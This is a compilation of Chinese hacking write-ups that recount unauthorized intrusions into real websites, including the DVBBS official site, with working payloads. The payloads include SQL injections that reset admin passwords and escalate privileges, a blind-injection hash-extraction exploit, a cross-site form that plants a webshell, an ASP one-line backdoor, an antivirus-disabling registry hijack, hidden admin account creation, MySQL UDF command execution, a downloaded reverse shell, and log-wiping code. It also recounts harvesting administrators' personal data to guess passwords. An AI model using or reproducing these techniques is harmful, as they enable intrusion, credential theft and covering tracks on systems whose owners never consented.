就想看一下安全怎么样~~

  搜索了一下站的程序版本是 影视剧场 的

 记得这好象这程序有漏洞~~

  后来进BAIDU搜索了一下这版本的漏洞 找到了漏洞进入了后台

     成功欺骗上传~

拿到了WEBSHELL

   服务器什么软件都没装   就开了80     wscript.shell组件虽然没删  但是利用不了~

3389是我后来自己帮他开的   本来他也没开的~

 提权   在他C:\RECYCLER\  上传了CMD    我们有时候上传CMD的时候太大了上传不了

  大家就用压缩工具压一下   只有 几十K了 

 OK 没问题了 可以执行命令    但是权限太小了 什么都干不了 

没办法    思考了一下~~

  又继续看他其他盘啊~~ 没发现什么 都是电影~

      查了一下质料~~  NET USER 看了一下  有一个ASP。NET用户~

   前一段不是有一个 ASP。NET  提权工具吗~

 就试一试把    上穿上去   执行命令 OK  是ADMIN权限

 哈哈~~爽。。。  因为他本来没开3389吗。。

 所以加用户也是假的~~ 开3389要重起 又怕他发现

就上传了一个木马~~吗的  发现被杀了 

看了一下进程   有NOD32   我操~~

怎么干他呢。。~~试了很多办法 没用   把进程结束了又恢复了。。

 有自动恢复进程功能~~ 

 就在网上找质料啊。。。 找了大概半个小时

 找到了一个 

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\**.exe" /v "Debugger" /d "ntsd -d" /t REG_SZ /f

这里的 **.exe 你自己替换一下程序名字 在去打开就不能运行了

ntsd -c q -p PID  Tasklist
 

应该知道把  镜象劫持技术~~

    把杀毒的 干了  用提权的运行了 木马 OK成功上线

 开了他3389  

 本次入侵没技术含量~请大家不要丢鸡蛋~

还有就是  在入侵的时候大家不要灰心。。不要怕麻烦。。尽管多试。。

不能入侵一半就退了。。今天不行还有明天，明天不行还有后天，，怕什么。机会多的事。。还怕他吃你，，只怕你吃他把~~哈哈 ~~现在搞不了他

总有一天要干了他~~在入侵一半的到一个WEBSHELL就不干了。。那你以后永远只能这样。。

不想当将军的兵的永远是一个兵。。  做人做事都是一样。。    也希望一些朋友看了后能得到经验。。学到东西。。

谢谢各位观看。。

 OK 就到这了。。

 牛族的兄弟  马上要过年了。。 希望大家开心，快乐~~

这是一个域名主机实时管理系统。在百度搜索： title: (域名主机实时管理系统) ，会找到大量采用这种系统的网站！太术语了。就是在线开通ftp.sql.web的一个管理系统。一套web程序。和IIS管理程序。实现在线开通的玩 意。所以：我们可以免费申请域名和空间！！哈哈！！！

web程序方面写的非常严谨。大量的过滤。由于是商业版的程序，所以我没有源码。本来是有的，但是放在家里的电脑上。放暑假时搞的shell现在都被删了。。。我现在又比较懒，就没去弄源代码。反正大家知道怎么弄的就行了。
 

这又是一个文本框的注射。我真不知道作者是怎么想的。其他地方都被过滤了。就留下域名管理这里没过滤。

官方放暑假的时候就被我搞了一遍，过了一个月他发现了。删了我的shell。不知道他怎么知道我从那里下的手搞的他。他居然补了漏洞。先上图，再说下利用方法。

123' UPDATE [memlst] SET u_pss='e10adc3949ba59abbe56e057f20f883e' WHERE u_nme='admin'--

这一句是把用户admin的密码修改为123456。管理员的后台地址一般是http://www.xx.com/master
或者直接在首页登陆了按切换到管理员后台。

如果admin不是超级管理员，那就有三个办法。

一是自己构造语句爆出来。
二是提升自己注册的用户的权限。
三是直接爆网站路径，再来个差异备份。

第一个方法我给出一条示范语句：

123' and (select top 1 isnull(cast([u_nme] as nvarchar(4000)),char(32))+char(94)+isnull(cast([U_pss] as nvarchar(4000)),char(32)) from (select top 2u_nme,U_pss from [hzhost]..[memlst] where 1=1 order by [u_nme]) t order by [u_nme] desc )>0-- and '1'='1

可以同时爆出一个用户的帐号和密码。想爆出其他用户的语句自己构造吧。

第二个方法是：

123' UPDATE [memlst] SET u_sys=6 WHERE u_nme='你注册的用户名'--123' UPDATE [memlst] SET u_pwr=2 WHERE u_nme='你注册的用户名'--

这2句话就能够提升自己为超级管理员

第三个方法很麻烦。但是很有效果。直捣黄龙。。很强大。我给出如下语句，大家自己研究去吧！

爆路径语句第一步：建立表123' ;drop table foofoofoo;create table foofoofoo([id] [int] identity (1,1) not null,[name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);-- and '1'='1第二步：123' ;declare @z nvarchar(4000) set @z=0x63003a005c00 insert foofoofoo execute master..xp_dirtree @z,1,1-- and '1'='1注意：0x63003a005c00 = C:\  为sql ENCODE其他的自己找工具去转吧！第三步：暴出总数 123' and (select cast(count(*) as varchar(8000))+char(94) from foofoofoo)>0-- and '1'='1第四步：暴出你想要的文件夹名字和文件名字 123' and 0<(select top 1 cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) from (select distinct top  1 * from foofoofoo order by isfile,name) t order by isfile desc,name desc)-- and '1'='1修改中间红色的1，依次爆出。

至于差异备份语句。让nbsi3告诉你吧。

对HZHOST域名虚拟主机管理系统sql注射漏洞进一步利用！

我记得还有2篇关于hzhost的漏洞利用文章。名字不记得了。大家去搜索“hzhost漏洞”找找吧！里面提到下面两点内容！

1。是提到c:\windows\temp下有hzhost主机留下的ftp登陆记录。有用户名和密码
2。是利用hzhost拿系统主机最高权限的。

安装了hzhost的主机,其mssql sa密码,mysql root密码还有serv-u的administrator密码全部保存在注册表中。位置在

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass
HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersvrpass

经过了hzhost自己的加密方式，象

eLVClO4tzsKBf#dee52443a3872cc159

这样的字符串。不过在hzhost后台可以还原！拿到了sa密码，或者root密码，最高权限就在眼前！禁止了w.s的话。大家就传aspx木马导撒！

我们传了一个asp木马上去后。在incs\constr.asp下面可以看到数据库连接串。然后连接到数据库。通过执行

SELECT * FROM [hstlst]

语句。可以看到很多主机记录。如图

发现什么没有？h_ftppass的密码和hzhost主机自己的加密串很相似。没错，主机管理的密码也是经过他自己的加密方式加了密！而我们在主机管理的地方！

看到明文密码。说明他又给还原回来了。明白了么？我们先通过aspx木马导出mysql，mssql的root,sa密码加密串后。

我们通过这条语句，修改别人的主机密码。

UPDATE [hstlst] SET h_ftppss='aPWw3j4zMaK83lHMBof9fc298b1d3d0a' WHERE h_ID=10000471

然后回过头去看主机密码。（这时候被转成了明文）

就拿到了root密码为：sphil_070921注意：由于有多种限制。我截的图可能不是很完美。但是此方法绝对可行。这方法是看到别人写的[利用hzhost取得最高权限]得到的启发。谢谢他。

我们也可以同样拿到sa密码，用sa帐号密码远程连接，直接恢复xp_cmdshell就可以执行系统命令了！

好了。就此结束！期待牛人写出还原密码程序！！这样就不用麻烦了！

　　时间过的真快，记得在07年1月份我写过一篇关于跨站添加管理员的文章，上期又给大家带来一期跨站的文章，小天对我那句话比较赞同，跨站的威力是不比注入小的，注入如果遇见SQL数据库还好说，ACC的也就能老老实实猜密码，进后台，在利用后台某个功能得WEBSHELL……说了几句题外话，下面我们一起来跨出WEBSHELL，OK，LET'S GO。

　　这里以网域高科行业B2B商务平台来测试一下，这套程序是修改阿里巴巴的程序，防注入做的比较好，但是在leaveword_save.asp文件里有一些变量没有过虑，下面是7到43行代码：

book_user=request.form("book_user") book_contact=request.form("book_contact") book_content=request.form("book_content") if sortid="" or tableid="" or ypid="" then response.write "<script>alert('未知错误');window.close();</Script>" response.End() end if if book_user="" or len(book_user)<2 or len(book_user)>16 then response.write "<script>alert('反馈出错，下面是产生错误的可能原因：\n\n·请输入 2-16 位字符的用户名！');window.close();</Script>" response.End() end if if book_contact="" or len(book_contact)<5 or len(book_contact)>40 then response.write "<script>alert('反馈出错，下面是产生错误的可能原因：\n\n·请输入 5-40 位字符的联系方式！');window.close();</Script>" response.End() end if if book_content="" or len(book_content)<5 or len(book_content)>100 then response.write "<script>alert('反馈出错，下面是产生错误的可能原因：\n\n·请输入 10-100 位字符的反馈内容！');window.close();</Script>" response.End() end if set rs=Server.CreateObject("Adodb.Recordset") sql="select * from SMT_leaveword" rs.open sql,conn,1,3 rs.addnew rs("SMT_book_user")=book_user rs("SMT_book_contact")=book_contact rs("SMT_book_content")=book_content '就用它吧，100个字符满够用了 rs("SMT_book_sort")=sortid rs("SMT_book_table")=tableid rs("SMT_book_ypid")=ypid rs.update rs.close set rs=nothing response.write "<script>alert('反馈成功，谢谢您的参与！');window.close();</Script>" response.End() %>

　　可以看出就是做了一些判断是否为空，和字数上的限制，不过book_content限制提交字数是100个，这对于我们来说已经足够了。

　　首先我们注册个用户，在意见反馈里填入跨站语句，如图1所示，这样直接在后台就会执行，如图2所示。

　　这样当然我们就可以做很多事情了，比如说像添加个管理员，不过以前已经写过所以就不在重复了，这个后台有数据库备份功能，我们要做的是利用管理员身份替我们备份出一个WEBSHELL来，先看看他的数据库备份代码是怎么写地，在admin\System\admin_backdb.asp文件中的108到129代码如下：

<form name="form1" method="POST" action="admin_backdb.asp?action=back"> <table width="100%" border="1" align="center" cellpadding="5" cellspacing="0" bordercolorlight="#cccccc" bordercolordark="#FFFFFF"> <tr> <td bgcolor="#efefef" height=25><strong>备份数据库</strong></td> </tr> <tr> <td height=25>你的空间只有支持fso才可以进行如下操作，否则你只能手动备份</td> </tr> <tr> <td height=25>数据库路径： <input type="text" name="currf" size="30" value="<%=db%>"></span>&nbsp;&nbsp; 备份数据目录：&nbsp; <input type="text" name="backf" size="20" value="mdbback"></td> </tr> <tr> <td height=25>数据库名称： <input type="text" name="backfy" size="20" value="back.asp">&nbsp; <input type="submit" name="Submit" value="备份" > <input type="reset" name="Submit2" value="重置" > </td> </tr> </table> </form>

我们可以先上传一个RAR的马儿，然后在数据库路径里填上，马的地址为："/oledit/UploadFile/200712/2007121544821758.rar"，这里需要注意的是路径一定要填对，否则备份就会不成功的。改动好的代码如下：

<html> <form name="form" method="POST" action="../../../admin/System/admin_backdb.asp?action=back"> <table width="100%" border="1" align="center" cellpadding="5" cellspacing="0" bordercolorlight="#cccccc" bordercolordark="#FFFFFF"> <tr> <td bgcolor="#efefef" height=25><strong>备份数据库</strong></td> </tr> <tr> <td height=25>你的空间只有支持fso才可以进行如下操作，否则你只能手动备份</td> </tr> <tr> <td height=25>数据库路径： <input type="text" name="currf" size="30" value="../../oledit/UploadFile/200712/2007121544821758.rar"></span>&nbsp;&nbsp; 备份数据目录：&nbsp; <input type="text" name="backf" size="20" value="hacklu"></td> </tr> <tr> <td height=25>数据库名称： <input type="text" name="backfy" size="20" value="hacklu.asp">&nbsp; <input type="submit" name="Submit" value="备份" > </td> </tr> </table> </form> <script>document.form.submit()</script> </html>

　　把这个保存为XX.jpg上传到服务器，因为HTML改成JPG是可以解析的，路径为：oledit/UploadFile/200712/200712155756468.jpg，在意见反馈里写上如下挂马语句：如图3，这样当管理员看到时就会自动备份出WEBSHELL来了，如图4，图5所示。

　　其实跨站还有很多可以做到的事，限于小天摧稿比较急，剩下的留给大家去挖掘吧。

注意:文章已经发表在2008第7期《黑客防线》上,转载请注明出处。（最近拿站比较多，没来得及写日志，拿这篇文章凑数！）

几个月前，DVBBS php2.0暴了一个可以直接读出管理员密码的sql注入漏洞，当时这个漏洞出来的时候，我看的心痒，怎么还会有这么弱智的漏洞，DVBBS php2.0这套代码我还没仔细看过，于是5月中旬我down下来粗略看了下，接着我花了三天的时间，拿下p.dvbbs.net，即动网php的官方网站，并得到了webshell。总的来说，这次入侵凭的是二分技术加一分运气。

一、 SQL注入漏洞：
晚上检查了好久，终于在topicother.php中发现了一处sql注入漏洞，但是并不像前段时间暴的漏洞那么简单，因为不能把密码直接读出数据库并显示出来，这是个活动帖子的报名主函数，我简单搜索了下，1.0好像后来就增加了这个功能。好了，来看具体函数：

function PostActive_Main(){
……
$TopicID = $GLOBALS['id'];
$activeid = trim($_GET['activeid']);//activeid并没有过滤
$timemode = $_POST['payment'];
$systemmode = trim($_POST['contact']);
$message = trim($_POST['message']);

$gettimemode = trim($_POST['timemode']);
$getstarttime = trim($_POST['starttime']);
$getendtime = trim($_POST['endtime']);
$getexpiretime = trim($_POST['expiretime']);

if($timemode ==0)
$costnum = 0;
else
$costnum = intval(trim($_POST['payvalue']));
//直接带进来使用了
if( $query = $db->query("SELECT u1.sex,u1.strength,u2.usersex FROM {$dv}active as u1,{$dv}user as u2 WHERE activeid={$activeid}")){
$activeinfo =& $db->fetch_array($query);
if( !empty($activeinfo) ) {
$db->free_result($query);
}
}
if( $num = $db->query("SELECT count(*) as num from {$dv}activeuser where activeid='".$activeid."'")){
$activenum = $db->fetch_array($num);
if( !empty($activenum) ) {
$db->free_result($num);
}
}
…
//如果查取的activeid不正确或者后面注入的条件不成立，则显示显示str1：对不起!本活动报名人数已满!
if($activenum['num']>=$activeinfo['strength']){
head(0,0,0,$arrNavMenu);
showmsg($lang['Active_Error.str1']);
exit;
}
//如果activeid正确（后面注入的条件也成立），但没有登陆，就显示str2：请登陆后操作!
if ($userid==0) {
head(0,0,0,$arrNavMenu);
showmsg($lang['Active_Error.str2']);
exit;
}
…
//如果activeid正确并且已经登陆了，递交的时候没有递交联系方式，则会显示str6这个错误：对不起联系方式不能为空或小于8个字符!
if (''==$systemmode||strlen($systemmode)<8) {
head(0,0,0,$arrNavMenu);
showmsg($lang['Active_Error.str6']);
exit;
}
…
}

首先先确定有没有activeid为1的活动帖子，就是在论坛目录后加上
topicother.php?t=9&action=join&activeid=1
显示“对不起!本活动报名人数已满!”则有可能不存在，自己注册个号进去发个活动帖子先。

根据上面解释，大家是否已经看出来该怎么注入啦，并不是什么都需要工具的，想当年ACCESS手工注入又不是没注入过，判断条件正确就返回正常，错误就不正常显示；这里不也是同样的道理么，不管有没登陆，出错都显示：“对不起!本活动报名人数已满!”，如果判断条件正确，没有登陆的话显示：“请登陆后操作!”，已经登陆了显示：“对不起联系方式不能为空或小于8个字符!”于是当晚我手动测试了一下官方，并成功获得了一个管理员的16位MD5的密码。兴奋的去睡觉，躺在床上却怎么也睡不着：怎么去更简单的利用呢？一边思考，一边入睡，睡着的时候天都亮了。

5个小时后，睡醒了继续搞，因为没有开发那种application程序的经验，所以我没想去写个exp工具，但一直手工多麻烦啊，记得以前开发网站的时候用ajax去get或者post数据并回显的，这里是不是也一样可以？于是自己尝试写，轻轻松松写出个单一判断md5某一位的ajax代码，可是在写循环的时候却出错了，后来flyh4t上线丢给我一段代码，我参考了一下然后一个可以读任意DVBBS php站点管理员密码的基于页面的Exploit code搞定了（列出主要代码）：

function sendCall(i,j,url,w,p) {
if (p=="temp"){p=url}
//后台密码、用户名、关联的前台用户名
switch(parseInt(w)){
case 0:url = p+"/**/and/**/ascii(mid(password,"+i+",1))="+j+")/**/";break;
case 1:url = p+"/**/and/**/ascii(mid(username,"+i+",1))="+j+")/**/";break;
case 2:url = p+"/**/and/**/ascii(mid(adduser,"+i+",1))="+j+")/**/";break;
//前台密码、用户名
case 3:url = p+"/**/and/**/ascii(mid(userpassword,"+i+",1))="+j+")/**/";break;
case 4:url = p+"/**/and/**/ascii(mid(username,"+i+",1))="+j+")/**/";break;
}
if (window.ActiveXObject) {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} else if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest();
//解决FF中跨域问题
try{
netscape.security.PrivilegeManager.enablePrivilege( "UniversalBrowserRead ");
} catch (e) {
alert( "Permission UniversalBrowserRead denied. ");
}
}
xmlHttp.onreadystatechange = function() {
if(xmlHttp.readyState == 4 && xmlHttp.status ==200) {
var str = xmlHttp.responseText;
var md5hash=document.getElementById("md5hash");
if(!str.match(/\u672c\u6d3b\u52a8\u62a5\u540d\u4eba\u6570\u5df2\u6ee1/)) {
pass += String.fromCharCode(j);
md5hash.innerHTML = pass;
j = 48;
i++;
}
else {
if(j == 59&&(parseInt(w)==0||parseInt(w)==3)) { j = 96; }
else { j++; }
}

if(pass.length >= 16) { alert("Exploitation Successfull!. Admin MD5 Hash(or username): "+pass); return true; }
sendCall(i,j,url,w,p);
}
}
xmlHttp.open('GET', url, true);
xmlHttp.send(null);
}

工具不支持中文用户名，但支持字母+数字+常用符号组合。

接着就简单啦，先判断下官网后台的管理员人数：
http://p.dvbbs.net/topicother.php?t=9&action=join&activeid=1/**/and/**/10=(select/**/count(*)/**/from/**/dv_admin)
然后判断一下后台管理员id是从多少到多少：
http://p.dvbbs.net/topicother.php?/topicother.php?t=9&action=join&boardid=2&id=1&activeid=1/**/and/**/1=(select/**/count(*)/**/from/**/dv_admin/**/where/**/id=1)
然后可以根据存在的后台id用工具去暴密码啦，速度还蛮快的，一会我就成功获得了后台所有的md5 password，cmd5.com去跑了下，只能跑出一个，其他不是not found就是要收费。到前台转了下，发现前台可以看到的管理员只有几个，貌似有的后台管理员前台并不显示为管理员，不过我也用工具暴出前台管理员的密码，留着备用，查了下，也只成功跑出了一个。

由于动网的前台与后台管理员之间有对应关系，因此不能用这个管理的前台密码加上那个管理员的后台密码去登陆后台，研究了下代码跟数据库，后台表中的adduser这个字段就是相对应的前台密码。可是既然这样，我得到的信息就无法利用，那怎么去获得一个后台权限呢，md5的存在让注入的光华变的暗淡了，怪不得当初那个漏洞那么简单的可以读密码那些大牛们都没把官方站点拿下，官方站不存在白痴管理员啊…

又到下午了，还是没有进展，我在想是放弃还是该怎么继续，去126邮箱翻翻ph4nt0m的一些帖子，我突然想到个方法…

二、 社会工程学：
其实这是让我洋洋得意的地方，我自我感觉无论什么技术，都没社会工程学来的让人心动，而且只要用用心，社会工程学就可以被演绎的淋漓尽致。但是这段让我非常兴奋的经历，我还是不能多写，因为这涉及到官方多位管理员的隐私，我只是简单的入侵检测，并不想成为别有用心之人的参考。

简单了说一下：由于adduser是中文的话，我的工具暴不了，但我可以用语句猜测（把adduser十六进制处理下就OK了）：
http://p.dvbbs.net/topicother.php?t=9&action=join&activeid=1/**/and/**/1=(select/**/count(*)/**/from/**/dv_admin/**/where/**/adduser=0x............/**/and/**/id=..)
我用..代替省略掉十六进制用户名，后面的ID也省略下。这样，我可以轻松的猜出后台某个ID对应的前台用户名，于是我找了几个管理员作为突破口。

因为我有前台管理员权限，于是我从前台找了下所有管理员、超级版主以及可以看到的动网团队的人员的信息，并收集归拢到一个txt文件中，然后我去百度跟谷歌搜索这些管理员的用户名，搜集一些他们平时访问的站点以及留下的信息：生日、身份证号码、QQ号码、电话号码、邮箱等等等，最后根据这些信息根据得到的md5密码猜测可能存在的密码，终于比昏昏然茫茫然的开始好多了，实在不行的时候，我再跑到DVBBS的ASP论坛去获取相关的信息，终于到最后一个下午的努力没有白费，我在晚上拿下了DVBBS php官方网站的后台：

异常兴奋，我给flyh4t截了个图宣扬了下战果，然后跑到ph4nt0m发了个帖子告诉大家社会工程学的伟大（结果被众大牛牛们鄙视了…寒）

三、 后台跨目录写文件漏洞：
一天的时间，我得到后台的管理权限，真的很艰难，但革命尚未结束，还没拿到webshell呢，不过一般而言，得到了后台权限，就离webshell不远了，flyh4t说写个模板就可以搞定了，我没着急搞，先去吃个饭…

回来后，我在后台用syinfo.php?act=phpinfo看了下系统，典型的LAMP
（linux,apache,mysql,php）组合，看来要努力的还很多啊；我按照常规思路准备写个php的模板，可是新建模板的时候却出错了：

不是0777权限，写不进去。怎么办？

后台晃悠，看看可不可以找到另外的突破口，可是很不幸，从晚上翻到凌晨都没发现有一处可以利用的地方，可能php后台拿webshell的方法我不熟，一直搞惯了asp的站，到php就思路堵塞了，百度了下方法，也没找到。难道伟大的革命要结束啦？

翻了一会，我居然在模板页面下面看到一个建目录的地方，不过依旧没权限建，哎，linux就是麻烦，如果是windows肯定不会权限这么变态的，自己的站一般情况下肯定可以写的，想到可写，我突然眼前一亮，对啊，这个站可以有可写的地方啊，比如上传头像上传图片或者文件，都需要可写的目录啊，linux权限设置的虽然变态，但总会留下个可以的地方的，可是问题是我该怎么利用？

胡乱尝试了好多次跨目录建目录或者文件失败后（现在回想回想怎么会出错的，我把目录跟英文名搞混淆了），我决定不要盲目搞了，读读源代码，于是我打开admin里的template.php开始读，这不读不要紧，一读居然发现了可以跨目录写文件的漏洞。

胡乱填路径肯定出错，还有出错的原因是中文名一定要输中文名，英文名称无所谓，看代码先：
if(!is_dir($destfile)) {
if ($issafemode = ini_get('safe_mode')) {
show_msg($lang['page_title'], str_replace('{$TPL_DIR}', $destfile, $lang['tpl.error12']));
footer();
exit;
}
if (!mkdir($destfile, 0777)) {
show_msg($lang['page_title'], $lang['tpl.error4']);
footer();
exit;
}
}
看来$destfile是关键了，再看看这个变量是什么：
$destfile = simpleMapPath($_POST['add_directory'].'/'.$_POST['add_ename']);
有个simpleMapPath在过滤啊，怪不得，再看看这个函数：
function simpleMapPath($path)
{
global $_SERVER;
if (empty($path)) {
return false;
}
$path = preg_replace('#(?:\\+)|(?:/+)#i', '/', $path);
if ($path{0} === '/') {
$documentroot = realpath(str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']));
return $documentroot.$path;
} elseif(substr($path, 0, 3) === '../') {
return $path;
} else {
return ROOT_PATH.$path;
}
}
这段函数看的我有点无语，实在看不出来他想过滤什么…专门写了个php文件把这个函数复制进去本机测试了下，完全可以写进上一层的目录。

无论是绝对路径还是相对路径都可以轻松在uploadfile里写个目录，然后写个模板里面，编辑下，于是拿到了webshell。此时天都快亮了，想睡觉的，可是睡不着，何不一气呵成，拿下系统权限？

四、 失败的提权：
由于提权失败了，所以这部分我也简单略过，虽然这花费了我一半的时间，可是水平不济啊。管理员权限给的太变态了，除了uploadfile，其他所有目录都不可写…不管了，有可写的地方就可以了，先查下服务器版本，输入uname -a;id，返回：
Linux p.dvbbs.net 2.6.9-5.ELsmp #1 SMP Wed Jan 5 19:30:39 EST 2005 i686 i686 i386 GNU/Linux
uid=2(daemon) gid=2(daemon) groups=1(bin),2(daemon),4(adm),7(lp)
检查了下perl 、wget，都安装上了，于是wget一个comeback.pl，接着用NC反弹下，也成功反弹回来本地shell，心想这么顺利啊，接下来就是提权了，可是翻遍了milw0rm.com，找了各种提权的利用程序，就是没有一个能成功的，我百度谷歌了N久，网上有关linux下提权的文章非常少，有的基本都是一个样，反弹一下然后提权，可是大家能轻松提权的prtcl.c在这里对它无可奈何…

到了下午实在太困了睡了一会儿，醒来后继续搞，但最后还是以失败告终，并且把它服务器溢出挂了，我赶紧收手，哎，我太菜了，就不做坏事了，留个页面纪念下：

五、 清理残留：
Linux下的残留我就没办法了，没提权成功，权限太小；但网站留下来的东西必须清理掉。于是写个clear.php：
define('ISDVBBS', TRUE);
require '../inc/config.php';
require '../inc/dv_clssql.php';
$db= new sqldb();
defined('DV_MUF_DB_HOST') AND ($dbhost = DV_MUF_DB_HOST);
$db->connect($dbhost, $dbuser, $dbpw, $dbname , $charset,$pconnect);
//清除我新建的模板
$db->query("DELETE FROM dv_styles WHERE name='啊啊啊'");
//清除我所在的IP后台操作日志
$db->query("DELETE FROM dv_log WHERE l_ip='58.213.51.65'");
echo "ok!";
?>
传到uploadfile里面，浏览器里运行下，于是ok…

总结：到此为止，入侵告一段落，由于水平有限，所以耗时比较多，整整三天睡了十个多小时（绝大多数时间耗在失败的提权里），这里我只想说，没有绝对安全的程序，也没有绝对安全的网站，技术固然重要，思路也必不可少。最后感谢flyh4t给予的大力支持，感谢老婆rolin的鼓励与端茶送水:)，欢迎大家访问我的网站：http://www.oldjun.com

群里很多人都在看，大家的目标都在那个上传以及fckeditor上，貌似还有ewebeditor，不过没登录地址，我开始也以为这个这是很古老版本的fckeditor，可以直接上传的，后来根据他们的反应，肯定不行；再看看后台那upload的源文件，没有filepath，十有八九是提交页面定义的filepath，对filename的审核我没看到源代码，所以我决定放弃这条线索。

整理下思路：前台我没看，不过既然大家这么忙活，肯定不是mssql了，既然是acc，思路很少的，上传用不起来，只剩两个思路了：1.暴库，如果是asp后缀的库，shell直接来了；2.写入，很多网站提供写入配置文件的，比如早年我搞得风讯。于是我仔细检查了下，没暴出库，我却找到了可以写配置文件的地方。虽然可以写，但还是别瞎写，记得曾经，看到一处可写，就直接写了，结果网站一下子报错，所有功能都用不起来了，因为之前<%还没闭合呢，而且说不定有过滤。

这个站究竟该怎么写，我也不敢乱写，百度了下这款CMS，同版本的源码下下来看了下，居然没有过滤，那就简单了，原来第一句话是这样的：

c_name    ="鼎峰企业智能建站系统ASP版官方网站"

后台直接写入：

"%><%execute request("oldjun")%><%a="

就成功闭合了：

c_name    ="鼎峰企业智能建站系统ASP版官方网站"%><%execute request("oldjun")%><%a=""

如图：

于是，网站就拿下了：

本文无任何技术含量，纯粹提醒大家，渗透的时候不要忘了各个细节，想拿shell很多路可以走～最后鄙视下骗子，坏人终究会有报应的～

这段时间失业，于是每天停留在各大招聘网站上，我习惯性的投一个简历检测一个站，该IT大卖场在南京在全国都是有名的，他们招维护网站的程序员，于是我一不小心去他们网站溜达了下，又一下子得到了系统权限，现在把过程写下来，重在思路。

一进首页，随便点个新闻进去加个1=2：
http://www.sxxxxxxe.com/2007/news.asp?c=0&id=30%20and%201=2返回错误，1=1都不要检测了，直接拿domain跑跑看吧，ACCESS的库，跑到username跟password的时候domain假死了，显示111条记录，貌似太多了点…换啊D试试，一样…

貌似注入这条路行不通…不管了，先找找后台，一下子扫到了：
http://www.sxxxxxxe.com/admin
试试or漏洞跟弱口令，都不行，登不进去…检测陷入僵局了，不过貌似这个站还有很多页面我没注意，于是又慢慢翻了一下，找到个bbs，管理员自己写的吧，存在注入，扫描了下，结果同上，注入失败！

Access下注入点如果得不到有用的信息跟注入点不存在没有什么两样，更何况这是个未知的asp系统（看不到源代码啊）。方法靠人想的，我发个帖子测试下有没跨站，试了下，果然存在：

如果实在没办法，我可以用跨站去盗后台管理员的cookies，这个方法是保留的，作为实在山穷水尽的下下策。

现在的我想到了社会工程学，bbs有2个版主，一个叫waryest，一个叫ww，我尝试用这两个名称作为用户名，找一些常见密码登陆后台，好运还真被我给撞上了，当尝试到用户名ww时，我用ww作为密码，居然登陆进去了：

后台有上传，试了下，可以上传asa后缀的文件，于是我上传了个webshell（N久没检测站了，这个webshell还是一年前用的），可是奇怪的很，当我访问那个webshell的时候，却出现要我登陆系统的对话框：

没遇到过，我怀疑upload文件夹没有权限，但windows系统下很少有对单文件夹设置权限的，不过我又被难住了，那怎么办呢？

继续在网站晃悠，突然发现刚刚那个bbs里有个被我遗忘的东西：ewebeditor，它可是我们入侵获得webshell的主要途径之一啊，还没用的着下数据库破密码，用原始密码就进去啦，新建一个样式，重新上传了个webshell到admin目录下，可是却出现同上的问题，一样要登陆，ewebeditor有个遍历文件的漏洞，用../../admin就可以浏览admin目录下的文件：

我检查了下刚刚上传的webshell，文件还在而且大小也没变，我怀疑与权限没关系，而是webshell被杀毒软件隔离了，以前遇到的不能免杀的webshell都是直接被杀毒软件杀的，所以只提示文件不存在…

那简单了，我花了一会儿免杀了下我的webshell，本机过了瑞星，上传上去，终于看到了熟悉的黑色，已经成功拿到webshell啦：

接下来就是提权了，首先检查了下组件，发现wscript.shell组件还在，于是netstat –an查看了下端口，3389与43958都开着呢，然后我在C盘Program Files下找到版本是6.2的SERV-U，看来提权不在话下啦。

添加个用户先：
cmd /c net user oldjun$ oldjun /add & net localgroup administrators oldjun$ /add
返回成功。

Net user检查了下确实成功了，立即登陆终端，可是终端客户端却无法连接。明明3389开了却连不上，难道我人品又报错了？命令行下运行net start查看了一下系统的服务，发现2003系统自带的防火墙开着，晕死。直接用SERV-U把它关掉：
cmd /c net stop sharedaccess
返回成功。

接着再连接，终于OK啦~~~~

渗透结束了，进去看了看，我们一开始的注入完全是被忽悠的，存后台用户名密码的mdb不是我们注入的那个mdb，我寒…再看看杀毒软件，装的是McAfee的VirusScan，并且启用了ScriptScan：ScriptScan扫描由Windows脚本主机执行的JavaScript和VBScript 脚本。WSH由Internet Explorer和Outlook使用。如果检测到有害的脚本，则不允许执行。怪不得我一开始的webshell用不起来呢…

OK，文章结束了，本文没有多少技术含量，但思路很清晰，我感觉技术跟思路同等重要，没有思路，再好的技术都没有用武之地，呵呵。如有不明白或者有问题的欢迎大家到我的网站来交流：http://www.oldjun.com。



此文写于三个月前，同样谈的是思路：

下午随便访问一个服装集团的网站，无意间发现网站后台的弱口令，于是稍微搞了下，webshell到手了（与主题无关，简单略过），这个服务器是某某科技的虚拟主机，可是我asp的webshell权限居然蛮大的，我兴奋了下：有戏了！

服务器是windows2000的系统，各个盘都可以访问，于是我一个盘一个盘的转悠，在c盘下看到了php文件夹，原来这服务器还支持php，不管怎样，php的权限应该比asp大吧，于是我上传了个php的webshell，开始想办法提权了。

一、 Serv-U提权：
我在服务器的M盘(管理员蛮有意思，D、E盘是光驱，C、M、N盘是本地磁盘)里的Program Files下发现了Serv-U，一看version，是6.0的，高兴了下，那还不轻松搞定…于是用webshell自带的Serv-U提权工具提权，显示如下图：

Recv: 200 EXEC command successful (TID=33).意思是成功了，可是命令下行下net user一下，却没有见到我应该看见的oldjun…

我无语了，难道说传说中RP有问题，再试了下，依旧显示成功却无效果…百度了下Serv-U提权，网上很多说不成功的都是因为版本问题或者就是Serv-U的默认管理密码被修改了，我这个版本肯定是满足的，难道默认密码被修改了（虽然webshell的回显告诉我是正确的）？

于是我把ServUDaemon.exe与ServUAdmin.exe下回来，用UltraEdit检查了下，可是密码确确实实是原始密码：

看来人品真的有问题，好运落不到我身上，再试了一次无果之后我决定放弃Serv-U，想其他办法了…

二、 mysql提权：
浪费了好长时间之后我决定不能吊死在一棵树上，这台服务器有mysql，只要有root权限，也是可以提权的啊，我去C盘winnt目录下看了下，发现了装mysql留下的配置文件：my.ini，于是得到了root的口令：

有了root口令，我还有早已准备好的mysql下提权的工具mysql.php，直接上传上去输入信息连接成功，接下来就简单啦，先导出udf.dll到C:\Winnt\下面。然后执行：
create function cmdshell returns string soname 'udf.dll'
提示成功后接着执行：
select cmdshell('net user oldjun oldjun /add')
返回成功：

接下来执行：select cmdshell('net localgroup administrators oldjun /add')同样返回完成。

